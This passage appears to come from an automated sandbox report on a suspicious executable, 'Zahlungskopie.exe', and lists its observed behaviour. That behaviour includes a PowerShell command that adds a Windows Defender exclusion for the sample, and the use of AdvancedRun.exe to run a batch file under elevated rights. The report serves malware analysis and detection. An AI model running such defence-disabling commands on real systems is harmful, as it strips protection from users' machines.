              Source: powershell.exe, 0000000B.00000003.811490211.000000000553D000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000003.856988920.0000000004CCA000.00000004.00000001.sdmpBinary or memory string: Hyper-V
              Source: Zahlungskopie.exe, 00000000.00000003.722702678.0000000005F73000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeCode function: 0_2_015DAD90 LdrInitializeThunk,0_2_015DAD90
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0040289F
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Zahlungskopie.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Adds a directory exclusion to Windows DefenderShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -Force
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeCode function: 7_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,7_2_00401C26
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Zahlungskopie.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\Desktop\Zahlungskopie.exe C:\Users\user\Desktop\Zahlungskopie.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /SpecialRun 4101d8 6584Jump to behavior
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
              Source: C:\Users\user\Desktop\Zahlungskopie.exeProcess created: C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\8f5d8ea2-6047-4797-be42-69846e079291\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: Zahlungskopie.exe, 00000012.00000002.915131640.00000000016E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Users\user\Desktop\Zahlungskopie.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Users\user\Desktop\Zahlungskopie.exe VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\Desktop\Zahlungskopie.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
